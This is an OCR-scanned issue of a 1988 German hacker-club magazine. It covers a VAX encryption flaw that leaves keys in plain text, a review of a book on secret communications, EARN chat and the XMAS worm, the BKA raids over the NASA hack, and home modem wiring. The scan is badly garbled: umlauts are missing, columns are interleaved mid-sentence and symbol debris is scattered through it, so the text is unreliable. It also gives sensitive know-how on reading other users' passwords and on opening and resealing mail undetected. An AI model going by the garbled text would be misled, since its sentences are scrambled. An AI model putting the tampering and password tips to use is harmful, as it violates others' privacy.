Ein weiterer Grund ist laut DEC-Venreter die Gefahr, da Hacker mit VAX-Encryption Unsinn treiben knnten und die Sicherheit von Systemen und Datenbestnden in Frage stellen wrden. Sicherlich ist die Verschlsselung von Daten nur so sicher, wie die Aufbewahrung des geheimen Schlssels sicher ist. Aufgefallen ist bei VAX-Encryption, da das geheime Codewort zwar Verschlsseltin der Proccess-Table steht, jedoch auch in Klartext im Recall-Buffer zu finden ist. Fr Hacker also kein Problem Uber den V M S S Y S T E M - A N A L Y S E R die Codewrter anderer Benutzer in Erfahrung zu bringen. Sicherlich sollte D E C seinen Werbeslogan Keine Chance fr Hacker" nochmal berdenken. S.Stahl

Abbildung rechts: Schema der Verschlsselung beim Blockhlfte. R die rechte Blockhlfte, als K: bis K,t sind aus dem Cesamischlssel abgeleitet werden, der aus deutet den Verrechnungsproze an. (Nach G. Herrmann IBM r j J f ^ f e S i c menMjIenbcr

CLINCHIDS-REDISTAtIL128.01.88/11:38/4065 Z. Seite $

Seite 7

^ J s ^ r p i c EwtcnSdjIcubcr

Geheime Nachrichten-Technik M l
Im Kampf um die Information
Neu i m Medienarchiv der D A T E N S C H L E U D E R ist das H a n d b u c h fr den p r i v a t e n NachrichtenSchutz". N a c h r i c h t e n w a f f e n " p r a n g t rot a u f dem s c h e r z e n Umschlag. Das Inhaltsverzeichnis weist mehrere Symbole f r den Schwierigkeitsgrad auf. Schlielich sind a u e r allgemein verstndlichen V e r f a h r e n w i e zwei Seiten alltagstaugliche Geheimtintenauflistung und Postfallenbeschreibungen auch m o d e r n e m a t h e m a tische Chiffrierverfahren e r k l r t . Die Privatstudie mit by Reb Harbinger von 1986 umfat gut 300 Seiten. Mengenmig wre das - nur als Ma fr die gegenwrtig verfgbare Datentechnologie, keine Bestellungen bitte, da nicht vorhanden -eine geschrumpft volle 720 Kilobyte-Diskette fr die bliche kleine Tasche in Jacke oder Hemd (nicht auf die Daten setzen!). sicherten als Public Domain erhltlichem Datenschrumpfprogramm erachtet. Bezeichnenderweise wurde es zu DES-Planungszeiten I B M untersagt, einen Computer mit einer lngeren und damit noch schwieriger zu berwindenden Schlssellnge als 64 bit herzustellen (ein 128 bit Gert lief im Versuch). Htte I B M sich nicht an diese Auflage gehalten, der Export dieser Computer wre untersagt worden, mit Hilfe der ITAR"Gesetze (International Traffic in Arms"), mit denen auch die Ausfuhr von Computertechnologie und Software geregelt wird. D i e berlebensdauer von D E S " scheint abgelaufen, da Fachleute sie auch im kommerziellen Bereich mit fnf, hchstens acht Jahren angeben. Vergleichsweise knnten schon entsprechend viele ber Transputer europischer Technologie verschaltete Heimcomputer von sonstwoher in den Gigaflop-Bereich dringen, der zu praktikabler DESAnalyse wohl bentigt wrde. In frheren Jahren wurden sogar Verffentlichungen ber Entwicklungen von sicheren" Schlsselsystemen - wie z. B. dem Public Key", von Hellman und Diffie - nach dem Kriegsgerte-Kontrollgesetz (Munition Control Act") zunchst von staatlicher Genehmigung abhngig gemacht. Inzwischen wurden diese Bestimmungen gelockert, so da dieses System im Vertragsdruck in der B R Deutschland ausfhrlich behandelt werden kann.

erfat. ...Lt. einiger hier zugnglicher Untersuchungen betreibt jedoch die Sowjetunion heute die grte Nachrichten-Aufklrungs-Organisation der Welt". ...Seit Mitte der 70er Jahre sind brieftaschengroe Heimatfunkstellen im Einsatz, deren frequenzhpfenden Signale in rtlichen Radiosendungen der Gegenseite verborgen (sub carrier) und wieder herausgefiltert werden konnten und umgekehrt via Satellit. ...In der B R D unterliegen Hersteller bei ihren Entwicklungen keinen Baubeschrnkungen. Die Inlandsberwachung von Nachrichtenverbindungen wird ber die Einrichtungen bei den Knotenmtern der Deutschen Bundespost durchgefhrt (siehe auch das Kapitel Postkontrolle"). ...In sterreich ist die Situation entspannter. Gerte zur Erzeugung von Schlsseln der hchsten Sicherheit werden produziert. ...Die Schweiz stellt seit lngerer Zeit Nachrichtenhchstsicherungsgerte her. Zu Zeiten des 2. Weltkrieges gab es nur in der Schweiz keine Beschrnkungen fr den Nachrichtenschutz. Bittesich vorzustellen: Die D D R als Demokratie nach Schweizer Vorbild bis 1990.

Das modernste in der Studie fr privaten Nachrichtcnschutz geschilderte tcilautomatisicrte Verfahren ist dagegen die Grundkonzeption eines Verschlsselungsprogrammes mithilfe eines Taschenrechners ab Generation TI 57. Ein PC oder H C mit Transputcr dran und die Nutzung der Rechenkapazitt zum Hufman-Coding oder der Schlssclbildung aus vereinbarten Bitwrfelregionen von Mandelbrotzufllen u.a.m. fehlen. Aber die veraltete Mikropunktherstellung wird erklrt. Die vom Ostblock ausgefhrte Mikrat-Kamera ist 25 m m kurz, 15 m m schmal und 5 mm flach. Die etwa 2 m m starke (l-)Linse verkleinert bis 1:1000. Dahinter die 15er Rundkassette. Das bringt gut beleuchtete Objekte etwa im Meierabstand auf den knapp mm-grossen schwarzen Punkt. Hierzulande kann nach dem - fast traditionellen ersten Schritt MINOX-Verkleinerung von 8 * l l " auf 8*11 m m mit handelsblicher Mikrofilmtechnologie (z. B. FUJI 850 Linien/mm) punktuell weiterverkleinert werden. Zum Vergleich: Laserdrucker bieten derzeit theoretisch 12 Linien/mm (300 dpi); oft ist der Toner grober (der SLM804 ist fein). Die besprochene Privatstudie wrde gerade noch lesbar im A6-Format auf 40 doppelseitig belaserte A4-Bltter passen. Auch groschengrosser Mehrfach-Druck ist mglich.

Ein Einleitungs-Abschnitt: Die USA"


Der erste Absatz wird jetzt unverndert zitiert, danach werden verschiedene Informationen aus der Studie assoziativ aktualisiert: In den Vereinigten Staaten ist fr die verschlsselte Datenbertragung im privaten" Bereich (z. B. fr Banken) von Gesetz wegen das sog. DES-System" (DataEncryptionSystem) vorgeschrieben. Es wurde von der Firma I B M , ursprnglich unter der Bezeichnung Lucifer", entwickelt. Lucifer bezeichnet historisch den gefallenen Engel, der den Menschen das Licht (Erleuchtung'?) brachte. Die National Security Agency" (NSA) - der grte technische Nachrichtendienst der westlichen Welt, ber den Leserinnen der oben genannten Privatstudie im Selbstverlag weiteres erfahren knnen - hat die Annahme dieses Systems fr den zivilen Sicherheitsgebrauch durchgesetzt. So geschehen, weil das DES-System" noch unterhalb der Grenze der fr die N S A berwindbaren liegt. DES verschlsselt mittels eines 64 Bit-Blocks und benutzt vom Schlssel 56 Bit. Auf dem Chaos Communication Congress Ende 1987 dienten bliche Domestos-Maschinen als Rechenknechte fr das dort vorgefhrte in der B R D entwickelte DES-Programm. DES wurde dort nur als sicher in Verbindung mit einem zustzlich ge-

Verschlsseln mit Zettel und Stift


Einen wichtigen Ausblick schildert der Autor. Schutzmanahmen im Privatbereich knnten so selbstverstndlich wie das Verschlieen eines Briefumschlages werden. Zu kurz kommt, da fr die neuen Datendienste fast jeder handelsbliche Computer entsprechende Sicherungsmglichkeiten bietet.

Im Kapitel Postberwachung" schlielich...

Ein paar weitere Infos aus dem Werk


... A m 1. Juli 1948 gab der Nationale Sicherheitsrat der U S A mit seiner Intelligence Directive" (NSCID) die ersten Richtlinien fr den gesamten Sichcrheitsbereich heraus, in denen auch die berwachung aller deijenigen europischen Nachrichtenverbindungen festgelegt wurde, in denen sicherheitsrelevante Meldungen mit militrischem, politischem, wissenschaftlichem oder wirtschaftlichem Inhalt enthalten sein knnten" (..which may concern information.."). ... Durch die Unterschrift unter ein Codewort (einer mu es ja wissen) besiegelte am 24. Oktober 1952 ein amerikanischer Prsident die Geburtsurkunde" der National Security Agency (NSA). ...Smtliche Ziele" der US Nachrichtenaufklrung sind aktuell in T E X T A , einer Art Bibel", vernetzt

...wird geschildert, wie es gemacht wird und was mensch dagegen tun kann. Die verschiedensten Verschlsselungsverfahren mit Neben den Trocken-Na-Dampf-ffnungsverfahZettel und Stift werden vorgestellt. Die meisten sind ren wird auch das einfache Abziehen und Wiederzwar gut beschrieben, aber recht kompliziert im aufkleben von als Postfalle aufgebrachten KlarVergleich zu dem einfachen, im Buch Im Zentrum sichtklebestreifen mittels Tetrachlorkohlenstoff der Spionage" ( I S B N 3-7758-1141-9) abgebildeten (scheitert bei dehn/reibarem Matt-Acetatband) beVerfahrendes MfS (DDR):diehufigenBuchstaben schrieben. Lehrreich sind geschilderte kleine A E I N R S werden durch eine einzige Ziffer (0..5) Dienst-Pannen, wenn etwa im verposteten sorgfltig I dargestellt, die 6 steht fr Code. Drei Ziffern mar- wiederverschlosscncn Umschlag nur die Kontrollkieren einen Begriff der hundertstelligen Jargonkopie lag und der Empfnger sich wunderte. Liste und die anderen Zeichen werden durch zwei Die Studie beschliet mit dem heiklen Thema Ziffern dargestellt. Die Zahlenverteilung zwischen Lngstwellen". Gehirn-Manipulation vermittels ein-, zwei- und dreistelligen Zahlen bei der Schlslangsam gepulster Funkwellen? selvergabe sollte fr Rauschen im Chi-Text sorgen Der Leiler der Forschungsabteilung am Pettis Me(siehe Abbildungen). morial Veterans Hospital in Kalifornien hatte VerD a die hundert hufigsten Wrter knapp die Hlfte suche mit einem aus der UdSSR stammenden eines Textes ausmachen und die hufigsten BuchLIDA-Gert" durchgefhrt. In der UdSSR wurde stabendurch eineZifferdargestelltwerden, verkrzt schon seit Jahren das LIDA-Gert" zur Ruhigund verschlsselt dieses Verfahren zugleich. stellung von Patienten, anstelle von Tranquilizern,

c ^ V

tT>nin,M ie

"ber

Seite 8

Seite 9

^ ^ p i c

<H""3d>lcukcr

angewandt und dabei deren unerwnschte pharmakologische Nebenwirkung vermieden." Die gepulsten Radiowellen des L I D A " regen die elektromagnetischen Gehirnstrme an und rufen einen trancehnlichen Zustand hervor. Lt. Gebrauchsanleitung wird das Gert in der U d S S R zur Beruhigung

Einladung
an den Polizeiprsidenten

H Modem-Workshop auf dem CCC 87


Entwicklung eines zulassungfhigen galvanisch gekoppelten Modems
Der C C C plant, eine Arbeitsgruppe ins Leben zu rufen, die i m L a u f des nchsten Jahres bis zur engltigen Festlegung der Zulassungsbedingungen fr teilnehmereigene Modems ein zulassungsfhiges, galvanisch gekoppeltes M o d e m entwickelt. Galvanisch gekoppelt bedeutet, da das Modem im Gegensatz zu einem Akustikkoppler elektrisch mit der Telefonleitung verbunden ist. Fr dieses Modem soll eine Seriezulassung beantragt werden; die Finanzierung derselben soll eventuell eine Zeitschrift bernehmen. Das Modem soll (von selbiger Zeitschrift) als Bausatz ausgeliefert und dann zur Endkontrolle nach Hamburg geschickt werden. In Hamburg wird beim C C C getestet, ob das Modem der Serienzulassung entspricht, und mit dem FZZAufkleber versehen. Die Kufer des Bausatzes sind also die Fertigung"; der C C C bernimmt gegen geringe Gebhr lediglich die Endkontrolle. In den nchsten Wochen soll geprft werden, ob ein solches Vorgehen rechtlich mglich ist. Die Kosten freine Serienzulassung liegen bei etwa 20.000 D M . Dieser Betrag mte von einer Firma oder Zeitschrift aufgebracht werden, die dafr die Vertriebsrechte an den Modembausatz erhlt.

H a m b u r g (ccc) - Der Chaos C o m p u t e r C l u b hat a m 23. Dezember 1987 den H a m b u r g e r Polizeiprsidenten in einem Telex z u m Congress eingeladen. Die E i n l a d u n g i m W o r t l a u t :

Modemminimalversion
Die grten Probleme liegen bei der Zulassungsfahigkeit" des Modems. Die Post wehrt sich mit Hnden und Fen gegen alles, was in dieser Richtung von privaten Anwendern unternommen wird. Die entgltigen Zulassungsbedingungen sind nicht bekannt, lediglich vorlufige Richtlinien sind verfgbar. Zunchst soll eine Minimalversion" des Modems entwickelt werden, die mglichst wenige Streitpunkte, die bei der Zulassung entstehen knnten (Hayes-Befehlssatz etc), streift. Sie soll zum legalen, kostenknstigen Betrieb einer Mailbox ausreichen. Die Enwicklungszeit hngt im wesentlichen davon ab, wie schnell die rechtliche Lage und die Bedingungen fr eine Zulassung vor dem Europischen Gerichtshof und bei der Bundespost endgltig geklrt sind. TREIPKY

Sehr geehrter Herr

Prsident,

wie Sie sicherlich aus der Presse erfahren haben, veranstaltet der Hamburger Chaos Computer Club e.V. auch in diesem Jahr seinen inzwischen traditionellen Chaos Communication Congress im Eidelstedier Brgerhaus. Der Congress findet am 27. und 28. Dezember statt. ImMittelpunkt der diesjhrigen Veranstaltung steht unter anderem eine Bewertung des sogenannten NASA-Hacks. Wir mchten Sie aus Anla des Kongresses zu einem persnlichen Gesprch einladen, in dem es Gelegenheit gibt, ber die Probleme der Computertechnik in verschiedenen Bereichen zu sprechen. Wir gehen davon aus, da ein solches Gesprch fr alle Beteiligten von Interesse ist.
bei Schlafstrungen und Spannungszustnden, sowie bei neurotischem Fehlverhalten" eingesetzt. ber starke niedrigfrequente Impuls-Sender lieen sich nichtoperative Ferneingriffe in die Gehimstruktur vornehmen (Surrogate lobotomies at long distance"), u m Gruppenverhalten zu beeinflussen. Beschrieben werden hilfreiche Forschung und Nutzung der Erkenntnisse auf der einen Seite und gewarnt vor dem Mibrauch Geheimer Nachrichtentechnik". z u m Nachteil der Freiheit der Menschen unserer Zeit. I n den vierseitigen Literaturhinweisen gibt es ausreichend Stoff fr Neugierigere.

Fr den Vorstand des Chaos Computer Club e.V., mit freundlichem Gru Reinhard Schrutzki

Bitnapping Party V1.0


Die Ermittlungen gegen Art d'Ameublement und Teile der Bielefelder Scene sind abgeschlossen. Das Verfahren wurde eingestellt, die Kosten werden von der Staatskasse getragen. Schadensersatzforderun-

Geschenk-Abos gen Osten


Nachdem die H A C K E R B I B E L Teil 1 (das Erscheinen des zweiten Teils ist derzeit noch durch BKA-Fremdeinwirkungen behindert) schon seit fahren in die D D R verschenkt werden darf, konnte der Verschenkdienst aktuell erweitert werden. Jetzt knnen auch komplette D A T E N S C H L E U DER-Abos, bis Nummer xx sogar rckwirkend, formlos in die D D R verschenkt werden! Einfach die DDR-Empfngeradresse, ab welcher Nummer derDS-Versand gewnscht wird und einen entsprechenden Scheck (8 Ausgaben D M yy) schicken. H A C K E R B I B E L D M 33,33 extra. Auslandsaufschlag ist nicht erforderlich!

gen wegen der Beschlagnahme (=Anwaltskosten) werden ebenfalls von der Staatskasse getragen. Quot erat - nochmal - quod erat expectaum!
CLINCI HCl IAOSIPADELUUNI07.02.88122:431324 Z.

Die Studie fr den privaten Nachrichtenschutz Geheime Nachrichtentechnik" ist mit 80 DM fr normale " DV-Anwenderlnnen nicht gerade billig, aber Preis-Wert". Sollte sie im rtlichen DV-Kleinhandel nicht erhltlich sein: Sie wird vertrieben von Utilisation Est, PF 856, FL-9490 Vaduz und beim Recon-Verlag, burg 73.
Wau 19.2.8822:35

Kurzmeldung
Whrend des letzten Pariser Salon du Livre" bildete sich eine Gruppe, die den K a m p f gegen die Zensur aufnahm: informel Renvoyons la censure". Das erste Bulletin mit Nachrichten aus der nicht nur franzsischen Welt gewisser groer Brder: Difpop, 14, rue de Nanteuil, F 75015 Paris.

Postfach, 2000 Ham-

t
( j ^ f e i c SnlenSHilcwbcr

( ^ g f ^ g O i c SalcnBrfjIciiSer

Seite 10

Seite 11

oder das Erste Auerirdische Regional Netz


V o r einigen Wochen entdeckteich, d a a n meiner Universitt ein Anschlu an E A R N existiert. E i n Bekannter lieh m i r sein L o g i n samt Passwort u n d los ging es. Als erstes strzte ich mich auf das Terminal, eine Siemensanlage unter dem V M / C M S Betriebssystem. Nach demEinloggen tippte ich erstmal SETUP NETZE u m das Netz zu aktivieren. A b da begannen die Schwierigkeiten. Mein erster Befehl, den ich an den EARN-Knoten absendete war/signup Vorname Nachname. Damit meldet man sich bei D E A R N als Benutzer des InterChat an. Nach meinem Handbuch htte jetzt die Meldung kommen mssen, da man sich freut, mich bei InterChat begren zu drfen. Darauf seelisch eingestellt, war die Meldung ' Y o u banned from this Relay' ein Schock. Unter Relay versteht man die einzelnen Knoten der Datennetze, die so aufgebaut sind wie E A R N bzw. das USGegenstck BITNIC. Nach Anfragen beim Operator bekam ich zu hren, da ich wohl gegendieEARN-Richtlinien verstoen habe. Mit diesem Aha-Erlebnis wurde ich bei dem Besitzer des Login vorstellig. Er war genau einmal bei E A R N gewesen, und da hatte er nichts getan. Eine suspekte Angelegenheit. Glcklicherweise bekam ich zwei Tage spter durch eine Vorlesung ein eigenes Login fr die Siemens. Ein weiterer Versuch, mich bei D E A R N einzuloggen brachte den gewnschten Erfolg. Auch der nchste Befehl - /signon Nickname Channel - klappte hervorragend. Dahn brach das Chaos auf meinem Bildschirm aus. Irgendwie sah es aus, als wrden hunderte von Leuten gleichzeitig in einer Mailbox miteinander reden. Nun, es waren etwa 30 Leute, die sich eingeloggt hatten. da die Netze eine nette Eigenschaft haben: Sie brechen gern zusammen. Zwischen den Relays liegen die Kabel bzw. Satellitenverbindungen, die allseits bekannten Links, und die beliebteste Fehlermeldung lautet 'Link Failure on xxxxx to yyyyy path' (Kurz LF). W e r einen EARN-Anschluss benutzen kann, sollte sich von E A R N die Hilfsliste schicken lassen. A u f gut V M / C M S heit das: 'Teil Relay at D E A R N /help'. Z u m Beispiel kann man mil /who abfragen, wer sich gerade auf E A R N aufhlt. Diese Informationen sind sehr strukturiert. Jemand von 'TAUrelay' kommt aus Israel. Jemand von 'Germany' kommt aus Deutschland (oder auch nicht). Jemand mit der Meldung 'Geneva' kommt meistens aus Irland. Zum Reden stehen die 'Public Channels' zu Verfgung. Das sind die Kanle 0 bis 99. W i l l man privater reden, wechselt man zu einem Kanal zwischen 100 und 999. Diese werden bei Abfragen von /who nicht angegeben. Es gibt noch die Kanle zwischen 1000 und 9999. Aber die sind nur besonderen Leuten vorbehalten.

EARN

Anfang Dezember '87 wurde der Deutsche Hauptknoten von Darmstadt nach Bonn verlegt. Auerdem wurde die Leitungen von 2400 Baud auf 9600 Baud erhht. Nachdem D E A R N wieder aktiv war, merkte man das sofort: Die L F kamen viel schneller. Geschwindigkeit ist bei E A R N so eine Sache. Man kann Glck haben, und die Anwort ist vor der Frage wiederda. Nachmittags dauert es5 Minuten, bisman eine Antwort bekommt. Dafr hat man morgens ein reines Vorort-Gesprch. Nur Deutsche, Bayern und Hollnder.

Es gibt zwei Mglichkeiten, mit X M A S umzugehen. Entweder man lt ihn gewhren und hat dann eine formatierte Platte. Oder man drckt Reset, dann braucht man eine Stunde, bis man durch einen Operator wieder Zugang zu seinem Rechner hat. 24 Stunden spter konnte man sich einloggen wo man wollte, egal ob Europa oder U S A , alles redete ber X M A S und wnschte dem Programmierer wenig Nettes. Die Variablennamen waren brigens Deutsch. In den folgenen Tagen mute man das Relay in Ruhe lassen, da durch das stndigebertragen von X M A S das Netz stark verlangsamt wurde. Interessant zu bemerken:" Eine Warnung in die USA hat die Operatoren dazu veranlat, in die Header der RelayMessages eine W a m u g einzubauen. Eine Warnung an den Deutschen Operator brachte keine Reaktion.

Der XMAS-Virus
In der zweiten Dezemberwoche kan es auf dem Relay zum ersten G A V (Grter Anzunehmender Vireneinsatz). An einem kalten Donnerstagmorgen

Wer gEARN mchte


Der Zugang zu E A R N wird in Deutschland ziemlich unterschiedlich gehandhabt. In Hannover und Hamburg wird dieser Zugang generell nicht erlaubt. In Heidelberg und Oldenburg kann jeder Student ans Netz. Sinnlos i s t E A R N sicher nicht. Man lemtLeute kennen und man bekommt Informationen. Wer allerdings auf billige Software hofft, hat keine Chance. Der normale Chatter ist ein Student der Naturwissenschaften ohne Computer. Sie kennen zum Teil nicht mal den Unterschied zwischen Bit und Byte. Aus manchen Universitten und Instituten schalten sich zu mehr als 80% nur Mdchen zu. Komisch, wenn man bedenkt, wie selten diese an Computern zu finden sind. Falls ihr mehr Uber E A R N wissen wollt: Ich bin ganz einfach zu erreichen: Teil 98B030 at DOLUN11 Text. Dann habt ihr mich meistens am Hrer. Es sei den ihr bekommt wieder ein L F o n D H V R R Z N 1 to D O L U N I 1 path. Dann habt ihr Pech gehabt.

2 vi; " 2

1 STOP Fx
5

f ^

FO .OZA-. c a i l ;

LN OG E E GN Y 0 MR E C D T N i fc i AC S DE T R R CO Y I S S A C STNi l

Die Anstandsregeln
Es gibt auch Richtlinien zur Benutzung von E A R N : - man darf nicht auf einen privaten Kanal wechseln, wenn dieser besetzt ist - man darf keine Zeichensatz-Bilder schicken - man darf nicht hart fluchen und schmutzige Witze erzhlen - man sollte Englisch reden - man darf nicht hacken. Es gibt noch andere Mglichkeiten auf E A R N . Zum Beispiel kann man sich auch an andere Relays wenden. Man darf sich zwar nicht einloggen, aber man kann erfragen, wer sich dort so tummelt. Mchte man jemanden anchatten, kann man ihn dann ber BITNIC/UNINET rufen. Dafr tippt man einfach 'Teil Userld at Standort'. A u f diese Weise erreicht man auch Leute, die normalerweise nicht in E A R N sind. Derzeit ist das z.B. die einzige Mglichkeit, das Wetter in Tokyo zu erfragen. Aber man kann natrlich auch Mailboxhnliche Systeme erreichen. Das bekannteste ist da wohl CS N E W S at M A I N E . Dort kann man sich alles schicken lassen, von PD-Software bis zum Gedicht des Tages. Ein andere Box ist UH-INFO, mit den Subservem Arpanet und Atarinet. /

0 0 B O

00
0 B

0 00
, - .M C * M X o O " {C O C '

LN DTK E C U O I A C A b S LlSTf DIAl I N O OE DlAt A S O H B t W S MW E O O V O" S jtlro * O iO ' CVS V V. CM All CW SJr'srtilti*" U C AO . S OJ V

Something about EARN


E A R N ist ein europisches Datennetz zum Austausch von Informationen und Programmen. Praktisch heit das, man kann auf dem Netz direkt mit anderen Leuten chatten. Nicht nur mit Leuten, die sich bei EARN-Relays einloggen, sondern mit jedem, der sich an einem Relay einloggt, da zu anderen Netzen Querverbindungen existieren, weltweit etwa 1300. Neben Europa und USA auch Exoten wie Canada, Mexiko, Israel und Japan. Allerdings ist das zu einem gewissen Mae Theorie,

Terra

O z !=> Ebekam ich ein File names X M A S . In meinem jugendlichen Leichtsinn startete ich es. Erst sah ich einen Weihnachtsbaum und dann zirka 30 FileendeBefehle. Das Programm ging meine Namensliste (diese existiert auf allen V M / C M S Rechnern und kann erweitert werden) durch und sendete sich selbst an die Leute. Q C X s tu 6

Seite 12

Seite 13

t ^ f ^ S i c SMcnSrijIcubcr

BKA unter Fahndungsdruck


C C C (Hamburg/Wiesbaden) - b e r vier M o n a t e sind vergangen, seitdem das Bundeskriminalamt ( B K A ) , mit in der Bundesrepublik beispielosen nchtlichen Hausdurchsungen, die Jagd a u f vermeintliche Hacker beim H a m b u r g e r Chaos Computer C l u b e.V. ( C C C ) erffnete. Mitte September trat der Club mit Informationen an die ffentlichkeit, dieein eklatantes Sicherheitsloch in einem Grorechnerbetriebssystem der Firma Digital Equipment belegten. Hacker" hatten sich an den Club gewandt, nachdem es ihnen gelang, in circa 135 Computersysteme des wissenschaftlichen Informationsnetzes der Luft- und Raumfahrt sowie der Hochenergiephysik einzudringen. Mittels sogenannter Trojanischer Pferde" untergruben sie die Sicherheitsroutinen und installierten unter anderem Programme, die die Kennworte aller Nutzer auskundschafteten. Betroffen von diesem Hack" waren neben der amerikanischen Raumfahrbehrde N A S A fhrende Institute im neun westlichen Lndern. Hacker in die Fertigungssteiirung eingedrungen. Die Ermittlungen der franzsischen Behrden fhrten in die Schweiz zum Genfer Kernforschungszentrum C E R N . Dieses beklagt schon seit 1984 stndig Einbrche durch Hacker. Unter den Hackern selbst gilt C E R N als die Europische Hackerfahrschule" in der sich die Hacker die Klinke in die Hand geben". Die schweizer Systemspezialisten uertenden Ermittlungsbehrden gegenber den Verdacht, da der Hamburger Chaos Computer Club Verursacher dieser Einbrche sei. So erwirkte die Staatsanwaltschaft, einen Tag nach Verffentlichung des Nasa-Hacks, die ersten Durchsuchungsbeschlsse. Inzwischen wird gegen sieben Computerfreaks" aus dem Umfeld des C C C , inzwischen auch wegen des publiziertem NASAHacks, ermittelt. Begleitet wurden die Ermittlungen durch ebensoviele Hausdurchsuchungen, bei denen umfangreiches Material sichergestellt wurde.

schwer Licht in das Dunkel dieses Falles zu bringen. M a g auch das sichergestellte Material an Umfang zwar zugenommen haben, so scheinen die Spezialisten vom BKA nicht in der Lage zu sein ihre Vorwrfe zu przisieren und zu belegen. Die Hoffnungslosigkeit der Bestrebungen des B K A wird ersichtlich wenn man Hintergrnde eines weiteren Verfahrens miteinbezieht. So wird gegen den Pressesprecher des Clubs, wclcher nach internen Informationen einer der Hauptverdchtigen sein soll, seit eineinhalb Jahren wegen des Verdachts auf Versto gegen das Fernmeldeanlagengesetz ermittelt. Normalerweise werden geringfgige Verste, bei gleichzeitig erhobenen schwereren Vorwrfen, eingestellt. So jedoch nicht in diesem Fall. Denn in der Ermittlungsakte findet sich ein Vermerk, da eine Anklage oder Verurteilung in den Ermittlungen des B K A kaum zu erwarten sei. So ist es zu erklren, da die Hamburger Staatsanwaltschaft zunchst das geringfgige Verfahren weiterverfolgt. Doch mit einer baldigen Einstellung des Hackerfalles ist nicht zu rechnen. So ist zu vermuten, da gerade die franzsichen Ermittlungsbehrden die Deutschen krftig unter Druck setzen, jetzt endlich einen mutmalichen Tter zu prsentieren und zu berfhren. Der Fahndungsdruck wird weiter erhht - Insider bezweifeln allerdings den Erfolg. So stellten schon die Hamburger Hacker fest: Der Gesetzgeber hat es versumt, mit Einfhrung der Straftatbestnde auch fr die ntige Ausbildung der Ermittlungsbehrden zu sorgen. So fehlt es dem B K A an Kompetenz und Augenma in dieser Sache. Eine Chance, so die Hacker, der wirklich gefahrlichen Computerkriminalitt Herr zu werden, haben die Computerspezialisten des B K A vertan.

Modemanschlu
Die Modem-Anleitung sagt b e r den Anschlu nichts Wichtiges aus, sondern ist (wegen der USA-Normen) eher etwas konfus. Es reicht aber der 2 Draht-Anschlu, wie er bei den meisten Hauptanschlssen auch verwirklicht wird, jedenfalls bei den alten" (neu heit: Spezialstecker fr I S D N , darber wei ich nix, drfte aber nur neuer Stecker sein). Dort gehen aus der Wand 4 Drhte raus, entweder steckbar (4 Pin-Stecker) oder so, da man einen Deckel abschrauben mu und (z.B.) ein 10-Meter-Kabel mit den Poststeckem (flach, rechteckig, durchsichtig) einfach angeschlossen werden kann. Wenn man sich den Stecker ansieht, sind dort nur 3 Kabel drin. Davon sind bei einer normalen" Anlage (1 Hauptanschlu, keine Nebenstelle) nur 2 Kabel wirklich angeschlossen: die beiden, die direkt nebeneinander liegen. Nur diese beiden sind auch wirklich wichtig, das Modem erkennt Klingeln - das deutsche Besetztzeichen usw. erkennt es leider nicht. An dem Modem ist ein einfaches, 4-poliges Kabel. Es werden nur die rote und die grne Leitung gebraucht, die anderen kann man abschneiden. Jetzt stellt sich die Frage, ob man immer umstecken will (oh wei!) oder umschalten oder alles (Teflon und Co.) immer dranlassen will. Das Modem hat noch einen zweiten Anschlu, an dem ein USA-Telefon (Stecker-Norm) so angeschlossen werden kann, da immer, wenn das Modem aus ist, von dort aus telefoniert werden, und auerdem mit den ModemBefehlen auf Telefon (Voice) und zurckgeschaltet werden kann. Dazu eignet sich gut ein ganz einfaches Telefon vom Conrad-Electronic-Grabbeltisch fr ca. 20 D M (ohne den Stecker!). Ich habe es etwas anders gemacht: Ich habe 2 Umschalter u pol & 1 pol) so mit dem ganzen Kram verltet, da ich entweder nur Post (2 pol!!) also normales Teflon dranhabe, oder Nicht Post, d.h. entweder Modem oder Ami-Phone (s.o. von Conrad), ber den 1-poligen Umschalter, der andere Pol liegt bei Modem & Phone gleichzeitig an. In das Ami-Phone hab ich auerdem noch einen Schalter eingebaut, mit dem sich das Mikro ausschalten lt. Dadurch, da das das Ganze steckbar gemacht wurde (6 M-Kabel vom Conrad), ist die Chose hllisch schnell abbaubar: Wandsockel auf, Kabel raus, Gehuse des Umschalters auf, Stecker (Original-PostTeflon!) raus, diesen Stecker in den Wandsockel, Deckel anschrauben - fertig. Das 10 M-Kabel kann die Pest m.E. nicht messen, der Rest ist immer nur dran, wenns gebraucht wird. WAB Legalize private Modems!

Raubkopien auf Grorechnern


Bei der durch den Club sofort nach Bekanntwerden eingeleiteten Schadensbegrenzung" wurde neben dem Hersteller auch der amerikanische Geheimdienst C I A informiert. Man wollte, so ein Clubsprecher, vermeiden, da der Club sich aufgrund der Brisanz der betroffenen Systeme zum Spielball der Geheimdienste entwickelt. So war es selbstverstndlich, da vor einer Verffentlichung die betroffenen Systeme wieder gesichert" werden muten. Beim Vergleich der von den Hackern" angefertigten Liste der betroffenen Computer mit der Liste des Herstellers ergaben sich jedoch zahlreiche Unstimmigkeiten. So wurden an fhrenden Forschungseinrichtungen, auch im Bundesgebiet, auf dem second hand Markt erworbene Grorechner ohne Lizenz betrieben. Gemeinhin wird soetwas als Raubkopie" bezeichnet. Als Folge der Verffentlichung dieses Hacks" besannen sich die Wiesbadener Polizeispezialisten einer Anzeige der franzsichen Niederlassung der Philips A G . Diese hatte im Herbst 1986 - nachdem der Gesetztgeber in der Bundesrepublick das Aussphen und Verndern von Daten unterStrafestellte - Anzeige erstattet. Nach Angaben von Philips waren g ^ ^ A t SnieitSiijlciibcr

MegaChip
NETWORKING
Hart getroffen wurden durch die Ermittlungen die beiden Vorstandsmitglieder des Clubs. Beide sind auch journalistisch ttig. Steffen Wernery unterhlt seit 1984 einen Informationsdienst im Bildschirmtextsystem der Post. Beiden Durchsuchungen wurde das Redaktionssystem sichergestellt, so da der Dienst nicht mehr fortgefhrt werden konnte. Zwei Monate allein bentigten die Spezialisten vom B K A , u m eine Kopie der fr die Fortfhrung des Dienstes bentigten Daten anzufertigen. Inzwischen sind auch Computerteile zurckgegeben worden. Dabei wurde festgestellt,da die Ermittlungen durch unsachgemen Umgang mit den Gertschaften und einem daraus resultierenden Gerteschaden verzgert wurden.

S. Wernery 062106 Feb 88 BEREICH

RED BKA

DRUCK

CUNCltlDS-REDIS.WERNERY/07.02.88llS:5llS614Z.

hoffnungslose Bestrebungen
Seit der letzten Durchsuchung sind knapp vier Monate vergangen. Bis zum heutigem Tage wird den Anwlten der Beschuldigten die Akteneinsicht verwehrt. Das B K A und die Staatsanwaltschaft tu n sich^

Seite 14

( " f f ^ r p i c ntcn6rf>lcubcr

Seite 15

